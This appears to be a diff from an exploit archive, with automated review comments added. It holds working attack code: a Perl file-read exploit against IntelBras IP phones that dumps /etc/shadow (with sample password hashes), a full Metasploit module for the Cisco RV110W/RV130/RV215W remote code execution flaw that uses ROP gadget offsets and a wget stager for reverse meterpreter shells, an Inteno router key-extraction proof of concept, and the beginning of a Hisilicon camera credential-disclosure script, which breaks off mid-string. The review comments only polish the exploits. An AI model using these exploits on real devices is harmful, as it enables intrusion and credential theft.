# # < Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
# # < Client-Peer => 192.168.1.1
# # < Client-Response-Num => 1
# # ========================================================================================================
# root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
# admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
# guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
#
# # ========================================================================================================
# [test@localhost intelbras]$
#
# Simple Mode:
# perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';
print "
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
";
exit;
}
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], " ");
$request->authorization_basic($user, $pass);
print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";
if ($response->content =~ m/$file/g){
my $content = $response->content;
$content =~ s/$file//g;
$content =~ s/^\n+//;
print $content;
print "\n# ========================================================================================================\n";
exit;
} else {
print "# Exploit failed or full path is wrong..\n";
exit;
}
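Review bot: the title says "Pre-Auth", yet the request carries `$request->authorization_basic($user, $pass)` with defaults `user`/`user` and the script exits on a 401, so the header should state that the issue relies on the device's default credentials rather than on no authentication at all. `$host."/cgi-bin/cgiServer.exx?..."` yields a double slash whenever the host argument ends in `/`, as every usage example does; and `$response->content =~ m/$file/g` interpolates the path as an unescaped regex (harmless for `/etc/shadow`, wrong for paths with `.` or `+`), so `\Q$file\E` should be used there and in the later `s/$file//g`.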

exploits/hardware/remote/47348.rb Executable file

@ -0,0 +1,423 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# linux/armle/meterpreter/bind_tcp -> segfault
# linux/armle/meterpreter/reverse_tcp -> segfault
# linux/armle/meterpreter_reverse_http -> works
# linux/armle/meterpreter_reverse_https -> works
# linux/armle/meterpreter_reverse_tcp -> works
# linux/armle/shell/bind_tcp -> segfault
# linux/armle/shell/reverse_tcp -> segfault
# linux/armle/shell_bind_tcp -> segfault
# linux/armle/shell_reverse_tcp -> segfault
#
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Deprecated
moved_from 'exploit/linux/http/cisco_rv130_rmi_rce'
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution',
'Description' => %q{
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall,
Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router
could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.
RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.
RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.
Note: successful exploitation may not result in a session, and as such,
on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
},
'Author' =>
[
'Yu Zhang', # Initial discovery (GeekPwn conference)
'Haoliang Lu', # Initial discovery (GeekPwn conference)
'T. Shiomitsu', # Initial discovery (Pen Test Partners)
'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'Platform' => %w[linux],
'Arch' => [ARCH_ARMLE, ARCH_MIPSLE],
'SessionTypes' => %w[meterpreter],
'CmdStagerFlavor' => %w{ wget },
'Privileged' => true, # BusyBox
'References' =>
[
['CVE', '2019-1663'],
['BID', '107185'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/']
],
'DefaultOptions' => {
'WfsDelay' => 10,
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
},
'Targets' =>
[
[ 'Cisco RV110W 1.1.0.9',
{
'offset' => 69,
'libc_base_addr' => 0x2af06000,
'libcrypto_base_addr' => 0x2ac01000,
'system_offset' => 0x00050d40,
'got_offset' => 0x0009d560,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.0.9',
{
'offset' => 69,
'libc_base_addr' => 0x2af08000,
'libcrypto_base_addr' => 0x2ac03000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.0.10',
{
'offset' => 69,
'libc_base_addr' => 0x2af09000,
'libcrypto_base_addr' => 0x2ac04000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.1.4',
{
'offset' => 69,
'libc_base_addr' => 0x2af54000,
'libcrypto_base_addr' => 0x2ac4f000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.1.7',
{
'offset' => 69,
'libc_base_addr' => 0x2af98000,
'libcrypto_base_addr' => 0x2ac4f000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV130/RV130W < 1.0.3.45',
{
'offset' => 446,
'libc_base_addr' => 0x357fb000,
'system_offset' => 0x0004d144,
'gadget1' => 0x00020e79, # pop {r2, r6, pc};
'gadget2' => 0x00041308, # mov r0, sp; blx r2;
'Arch' => ARCH_ARMLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
}
},
],
[ 'Cisco RV215W 1.1.0.5',
{
'offset' => 69,
'libc_base_addr' => 0x2af59000,
'libcrypto_base_addr' => 0x2ac54000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.1.0.6',
{
'offset' => 69,
'libc_base_addr' => 0x2af59000,
'libcrypto_base_addr' => 0x2ac54000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.2.0.14',
{
'offset' => 69,
'libc_base_addr' => 0x2af5f000,
'libcrypto_base_addr' => 0x2ac5a001,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.2.0.15',
{
'offset' => 69,
'libc_base_addr' => 0x2af5f000,
'libcrypto_base_addr' => 0x2ac5a000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.3.0.7',
{
'offset' => 77,
'libc_base_addr' => 0x2afeb000,
'libcrypto_base_addr' => 0x2aca5000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x000a0530,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.3.0.8',
{
'offset' => 77,
'libc_base_addr' => 0x2afee000,
'libcrypto_base_addr' => 0x2aca5000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x000a0530,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
],
'DisclosureDate' => 'Feb 27 2019',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_DOWN, ],
},
))
end
def p(lib, offset)
[(lib + offset).to_s(16)].pack('H*').reverse
end
def prepare_shellcode(cmd)
case target
# RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7
# RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8
when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11]
shellcode = rand_text_alpha(target['offset']) + # filler
rand_text_alpha(4) + # $s0
rand_text_alpha(4) + # $s1
rand_text_alpha(4) + # $s2
rand_text_alpha(4) + # $s3
p(target['libc_base_addr'], target['system_offset']) + # $s4
rand_text_alpha(4) + # $s5
rand_text_alpha(4) + # $s6
rand_text_alpha(4) + # $s7
rand_text_alpha(4) + # $s8
p(target['libcrypto_base_addr'], target['gadget1']) + # $ra
p(target['libc_base_addr'], target['got_offset']) +
rand_text_alpha(28) +
cmd
shellcode
when targets[5] # RV130/RV130W
shellcode = rand_text_alpha(target['offset']) + # filler
p(target['libc_base_addr'], target['gadget1']) +
p(target['libc_base_addr'], target['system_offset']) + # r2
rand_text_alpha(4) + # r6
p(target['libc_base_addr'], target['gadget2']) + # pc
cmd
shellcode
end
end
def send_request(buffer)
begin
send_request_cgi({
'uri' => '/login.cgi',
'method' => 'POST',
'vars_post' => {
"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": 0,
"change_action": "",
"enc": 1,
"user": rand_text_alpha_lower(5),
"pwd": buffer,
"sel_lang": "EN"
}
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
end
end
def check
# We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users.
# We use lang_pack/EN.js because it's the one file that changes the most between versions.
# Note that it's not a smoking gun given that some branches keep the exact same files in /www
# (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)
fingerprints = {
"69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => {
"version" => "Cisco RV110W 1.1.0.9",
"status" =>Exploit::CheckCode::Vulnerable
},
"8d3b677d870425198f7fae94d6cfe262551aa8bd" => {
"version" => "Cisco RV110W 1.2.0.9",
"status" => Exploit::CheckCode::Vulnerable
},
"134ee643ec877641030211193a43cc5e93c96a06" => {
"version" => "Cisco RV110W 1.2.0.10",
"status" => Exploit::CheckCode::Vulnerable
},
"e3b2ec9d099a3e3468f8437e5247723643ff830e" => {
"version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
},
"6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => {
"version" => "Cisco RV130/RV130W 1.0.0.21",
"status" => Exploit::CheckCode::Vulnerable
},
"9b1a87b752d11c5ba97dd80d6bae415532615266" => {
"version" => "Cisco RV130/RV130W 1.0.1.3",
"status" => Exploit::CheckCode::Vulnerable
},
"9b6399842ef69cf94409b65c4c61017c862b9d09" => {
"version" => "Cisco RV130/RV130W 1.0.2.7",
"status" => Exploit::CheckCode::Vulnerable
},
"8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => {
"version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16",
"status" => Exploit::CheckCode::Vulnerable
},
"8c8e05de96810a02344d96588c09b21c491ede2d" => {
"version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
},
"2f29a0dfa78063d643eb17388e27d3f804ff6765" => {
"version" => "Cisco RV215W 1.1.0.5",
"status" => Exploit::CheckCode::Vulnerable
},
"e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => {
"version" => "Cisco RV215W 1.1.0.6",
"status" => Exploit::CheckCode::Vulnerable
},
"7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => {
"version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15",
"status" => Exploit::CheckCode::Vulnerable
},
"050d47ea944eaeadaec08945741e8e380f796741" => {
"version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
}
}
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'lang_pack/EN.js')
})
if res && res.code == 200
fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}")
if fingerprints.key?(fingerprint)
print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}")
return fingerprints[fingerprint]["status"]
else
print_status("Couldn't reliably fingerprint the target.")
end
end
Exploit::CheckCode::Unknown
end
def exploit
print_status('Sending request')
execute_cmdstager
end
def execute_command(cmd, opts = {})
shellcode = prepare_shellcode(cmd.to_s)
send_request(shellcode)
end
def on_new_session(session)
# Given there is no process continuation here, the httpd server will stop
# functioning properly and we need to take care of proper restart
# ourselves.
print_status("Reloading httpd service")
reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
else
session.shell_command(reload_httpd_service)
end
ensure
super
end
end
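Review bot: `check` correctly returns `Exploit::CheckCode::Unknown` for the EN.js hashes that are shared between fixed and vulnerable builds (the 1.2.1.x/1.2.2.x, 1.0.3.x and 1.3.x entries), which matches the comment about identical `/www` trees; two style points remain: `"status" =>Exploit::CheckCode::Vulnerable` in the RV110W 1.1.0.9 entry is missing the space every other entry has, and `Digest::SHA1.hexdigest("#{res.body.to_s}")` wraps an already-String body in a redundant interpolation. The description's warning that `on_new_session` cannot repair httpd when no session comes back is properly matched by `'Stability' => [ CRASH_SERVICE_DOWN, ]`; the comment block at the top listing which `linux/armle` payloads segfault would be more useful in the `Description` or a `Notes` entry, where `info` displays it.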


@ -0,0 +1,96 @@
# Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions
# Date: 2019-06-29
# Exploit Author: Gerard Fuguet (gerard@fuguet.cat)
# Vendor Homepage: https://www.intenogroup.com/
# Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650
# Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937
# Affected Component: SIP password, Info Gathering of Network Config
# Attack Type: Remote
# Tested on: Kali Linux 2019.2 against an Inteno EG200 Router
# CVE : CVE-2019-13140
# Description:
Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before
firmwares routers have a JUCI ACL misconfiguration that allows
the "user" account to extract the 3DES key via JSON commands to ubus.
The 3DES key is used to decrypt the provisioning file provided by
Adamo Telecom on a public URL via cleartext HTTP.
# Attack Vectors:
To get success on the exploitation, two components are mandatory: 1.
the encrypted file (.enc) and 2. The 3DES key for decrypt it. The
encrypted file can be downloaded via HTTP URL offered by Adamo ISP
(works from any external network). Then is need to interact with the
router using WebSocket protocol to obtain the 3DES key, a web browser
like Firefox can be used as WebSocket client under the developer
tools. Session id is acquired with the same username and password of
the router (in this case, password is the same as wifi defaults). Once
3DES key is obtained through a JSON request command, .enc file can be
decrypted with the help of openssl tool.
# PoC:
Step 1: Getting the provisioning file
Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc
Where XXXXXXXXXXXX is your routers Inteno MAC, all in capitals and without
the colons. You can also get your MAC by doing a ping to the router
and then an arp command on terminal.
Step 2: The 3DES Key
Let's communcatie by Sockets
- Using Firefox, open the routers webpage (192.168.1.1 by default).
- Invoke the developer tools by pressing F12 and go to the Console Tab.
- Lets create the WebSocket:
var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json")
- And creating the Log for show responses in each petition:
superSocket.onmessage = function (event) {console.log(event.data)}
- We request an ID session with the same login parameters that when access
to the routers website. (put your wifis router password instead of
wifis-password value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666}))
- Now, you will obtain a response, the value of the parameter that says
“ubus_rpc_session” refers to your sessions ID, copy it to use in the next
request call.
- Requesting information about the routers System. (put your session ID
instead of put-your-session-id-here value):
superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999}))
- On the response obtained, copy the value of the “des” parameter.
Its 16 digits that we need convert to hexadecimal.
Step 3: Ready for Decrypting
Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key:
echo -n XXXXXXXXXXXXXXXX | xxd -p
- Use openssl tool to decrypt your provisioning file. (Put your "des" key
instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX
refers the name of your encryption provisioning file, in the -out
value, the name can be different):
openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz
- Uncompress the decrypted file:
tar -xzvf XXXXXXXXXXXX.tar.gz
- You get the file: Provisioning.conf.
- Showing the file:
cat Provisioning.conf
- The end of the line refers to the secret, the password of your
SIP account.
A video was created to show all these Steps in action:
https://youtu.be/uObz1uE5P4s
# Additional Information:
A packet sniffer like Wireshark can be used for retrieve the 3DES key
instead of using WebSocket communication protocol. In that case, user
needs to do the login on the router's page, and then the JSON request
containing the 3DES key will be catched.
# References:
https://twitter.com/GerardFuguet/status/1169298861782896642
https://www.slideshare.net/fuguet/call-your-key-to-phone-all
# Timeline:
2019-06-29 - White Paper done
2019-07-01 - CVE assigned
2019-07-09 - Notified to Inteno
2019-07-11 - Adamo aware and ask for detailed info
2019-07-12 - Info facilitated
2019-07-25 - Early patch available and applied (Cooperation starts)
2019-07-26 - Tested and failed (VoIP not working)
2019-08-27 - New firmware available
2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router
2019-08-31 - Tested OK
2019-09-04 - Disclosure published
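Review bot: the header's "Fixed Version" line is the only remediation guidance in the file, even though the Timeline confirms the fix ("2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router", "2019-08-31 - Tested OK"); add a short Mitigation entry telling affected users to update to that firmware, and say whether the fix also changes how the provisioning file is served, since the Attack Vectors section makes the publicly downloadable .enc file (fetched "via cleartext HTTP", "works from any external network") the second mandatory component alongside the key. Minor wording in the PoC steps: "Let's communcatie by Sockets" should read "communicate", "catched" in Additional Information should be "caught", and "routers" / "wifis" are possessives (router's, wifi's).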

exploits/hardware/remote/47405.pl Executable file

@ -0,0 +1,114 @@
#!/usr/bin/perl -w
#
# Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# # [
# # [ Hisilicon HiIpcam V100R003 Remote ADSL Credentials Disclosure
# # [ =============================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [
# # [ Disclaimer:
# # [ This or previous programs are for Educational purpose
# # [ ONLY. Do not use it without permission. The usual
# # [ disclaimer applies, especially the fact that Todor Donev
# # [ is not liable for any damages caused by direct or
# # [ indirect use of the information or functionality provided
# # [ by these programs. The author or any Internet provider
# # [ bears NO responsibility for content or misuse of these
# # [ programs or any derivatives thereof. By using these programs
# # [ you accept the fact that any damage (dataloss, system crash,
# # [ system compromise, etc.) caused by the use of these programs
# # [ are not Todor Donev's responsibility.
# # [
# # [ Use them at your own risk!
# # [
# # [ Initializing the browser
# # [ Server: thttpd/2.25b 29dec2003
# # [ The target is vulnerable
# # [
# # [ Directory Traversal
# # [
# # [ /cgi-bin/..
# # [ /cgi-bin/adsl_init.cgi
# # [ /cgi-bin/chkwifi.cgi
# # [ /cgi-bin/ddns_start.cgi
# # [ /cgi-bin/getadslattr.cgi
# # [ /cgi-bin/getddnsattr.cgi
# # [ /cgi-bin/getinetattr.cgi
# # [ /cgi-bin/getinterip.cgi
# # [ /cgi-bin/getnettype.cgi
# # [ /cgi-bin/getupnp.cgi
# # [ /cgi-bin/getwifi.cgi
# # [ /cgi-bin/getwifiattr.cgi
# # [ /cgi-bin/ptzctrldown.cgi
# # [ /cgi-bin/ptzctrlleft.cgi
# # [ /cgi-bin/ptzctrlright.cgi
# # [ /cgi-bin/ptzctrlup.cgi
# # [ /cgi-bin/ptzctrlzoomin.cgi
# # [ /cgi-bin/ptzctrlzoomout.cgi
# # [ /cgi-bin/ser.cgi
# # [ /cgi-bin/setadslattr.cgi
# # [ /cgi-bin/setddnsattr.cgi
# # [ /cgi-bin/setinetattr.cgi
# # [ /cgi-bin/setwifiattr.cgi
# # [ /cgi-bin/testwifi.cgi
# # [ /cgi-bin/upnp_start.cgi
# # [ /cgi-bin/upnp_stop.cgi
# # [ /cgi-bin/wifi_start.cgi
# # [ /cgi-bin/wifi_stop.cgi
# # [
# # [ File Reading
# # [
# # [ var ip = "" ;
# # [ var adslenable = "" ;
# # [ var username = "hacker" ;
# # [ var password = "133337" ;
# # [ var dnsauto = "1" ;
# # [ var dns1 = "8.8.8.8" ;
# # [ var dns2 = "8.8.4.4" ;
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use HTML::TreeBuilder;
$| = 1;
my $host = shift || 'https://192.168.1.1/'; # Full path url to the store
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
my $banner = "\x5b\x20\x0a\x5b\x20\x48\x69\x73\x69\x6c\x69\x63\x6f\x6e\x20\x48\x69\x49\x70\x63\x61\x6d\x20\x56\x31\x30\x30\x52\x30\x30\x33\x20\x52\x65\x6d\x6f\x74\x65\x20\x41\x44\x53\x4c\x20\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73\x20\x44\x69\x73\x63\x6c\x6f\x73\x75\x72\x65\x0a\x5b\x20\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x5b\x20\x45\x78\x70\x6c\x6f\x69\x74\x20\x41\x75\x74\x68\x6f\x72\x3a\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x20\x32\x30\x31\x39\x20\x3c\x74\x6f\x64\x6f\x72\x2e\x64\x6f\x6e\x65\x76\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3e\x0a\x5b\x0a\x5b\x20\x20\x44\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x3a\x0a\x5b\x20\x20\x54\x68\x69\x73\x20\x6f\x72\x20\x70\x72\x65\x76\x69\x6f\x75\x73\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x61\x72\x65\x20\x66\x6f\x72\x20\x45\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x0a\x5b\x20\x20\x4f\x4e\x4c\x59\x2e\x20\x44\x6f\x20\x6e\x6f\x74\x20\x75\x73\x65\x20\x69\x74\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x2e\x20\x54\x68\x65\x20\x75\x73\x75\x61\x6c\x20\x0a\x5b\x20\x20\x64\x69\x73\x63\x6c\x61\x69\x6d\x65\x72\x20\x61\x70\x70\x6c\x69\x65\x73\x2c\x20\x65\x73\x70\x65\x63\x69\x61\x6c\x6c\x79\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x0a\x5b\x20\x20\x69\x73\x20\x6e\x6f\x74\x20\x6c\x69\x61\x62\x6c\x65\x20\x66\x6f\x72\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x73\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x64\x69\x72\x65\x63\x74\x20\x6f\x72\x20\x0a\x5b\x20\x20\x69\x6e\x64\x69\x72\x65\x63\x74\x20\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x20\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x20\x6f\x72\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x61\x6c\x69\x74\x79\x20\x70\x72\x6f\x76\x69\x64\x65\x64\x0a\x5b\x20\x
